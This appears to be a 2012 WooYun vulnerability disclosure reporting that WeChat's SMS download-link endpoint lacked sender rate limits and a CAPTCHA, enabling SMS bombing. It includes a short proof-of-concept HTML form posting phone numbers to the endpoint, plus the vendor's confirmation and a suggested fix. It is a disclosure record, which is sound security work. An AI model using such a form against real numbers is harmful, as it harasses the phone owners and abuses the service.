当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-05683

漏洞标题:腾讯微信短信轰炸

相关厂商:腾讯

漏洞作者: kookxiang

提交时间:2012-03-31 13:51

修复时间:2012-05-15 13:51

公开时间:2012-05-15 13:51

漏洞类型:设计缺陷/逻辑错误

危害等级:低

自评Rank:2

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-03-31: 细节已通知厂商并且等待厂商处理中
2012-04-01: 厂商已经确认,细节仅向厂商公开
2012-04-11: 细节向核心白帽子及相关领域专家公开
2012-04-21: 细节向普通白帽子公开
2012-05-01: 细节向实习白帽子公开
2012-05-15: 细节向公众公开

简要描述:

可以用来短信轰炸,没有验证码,你懂得~

详细说明:

微信虽然做了针对号码的频率限制,但未对发送者发送频率做限制,即被拦截后还可以发给下一个手机,继续轰炸 = =

漏洞证明:

构造表单:

<form method="post" action="http://weixin.qq.com/cgi-bin/downloadurl?t=weixin_getdownurl_sms&s=send&check=false">
<input type="hidden" name="country" value="+86" />
<input type="text" name="phone" />
<input type="submit" />
</form>

提交即可

修复方案:

针对发送者ip增加限制 或 连续发送增加验证码

版权声明:转载请注明来源 kookxiang@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2012-04-01 18:48

厂商回复:

非常感谢您的报告

最新状态:

暂无